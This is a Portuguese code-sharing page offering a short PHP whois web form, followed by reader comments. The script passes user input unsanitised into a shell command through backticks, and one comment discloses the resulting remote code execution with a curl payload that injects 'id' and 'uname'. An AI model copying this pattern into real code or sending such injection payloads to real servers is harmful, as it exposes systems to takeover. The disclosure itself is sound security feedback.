Whois em PHP

Publicado por Perfil removido (última atualização em 14/11/2012)

[ Hits: 6.581 ]

Download whoisphp.php




Script simples em PHP para consulta whois.

  



Esconder código-fonte

<?php

/*
 * Scripit PHP para gerar whois 
 * 
 *  code by @Kouback_TR_
 *  http://koubacktr.com/
 *  http://twitter.com/kouback_tr_
 */
  
print"
<title>PHP-Kouback-Whois</title>
<body bgcolor=#000000>
<center><b><font size=6><font color=#FFFFFF>-=Whois=-</font></font></b></center>
<form method='post' action='?action=whois'>
<br>
<b><center><font color=#FFFFFF>Target whois</font></center></b>
<center><input type=text name=target></input></center></pre>
<center><input type=submit value='whois'></input></center>
<br><br><br><br>";

if($_GET['action'] == "whois"){
   
$target = $_POST['target'];
$whois = `whois $target && arp -a`;
print"
<CENTER><TABLE DIR=LTR WIDTH=50% BORDER=1 CELLPADDING=4 CELLSPACING=3><COL WIDTH=256*><TR><TD WIDTH=100% VALIGN=TOP><P><font color=#00FF14 size=2>";
echo nl2br($whois);
print"</P></TD></TR></TABLE></CENTER>";
}

?>

Scripts recomendados

Tradutor Google

Script PHP para fazer UPLOAD de arquivos

Monitoramento simples de servidores

Apache VirtualHosts Config

php-scan-rede - scanner de rede simples em PHP


  

Comentários
[1] Comentário enviado por fvox em 14/11/2012 - 10:06h

Hi.

Muito cuidado ao usar backticks pois é uma alias para a função shell_exec().
Seu código apresenta uma vulnerabilidade conhecida como RCE (Remote Code Execution).

Exploit:
:~$ curl -s "http://localhost/whois.php?action=whois" --data "target=whois fvox; id;uname -srmo #"
[...]
No whois server is known for this kind of object.<br />
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)<br />
Linux 2.6.xx-xx-generic x86_64 GNU/Linux<br />

[2] Comentário enviado por removido em 14/11/2012 - 19:27h

Obrigado amigo pela dica, e parabéns pela otima visão da falha, a internet precisa de mais gente como vc


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts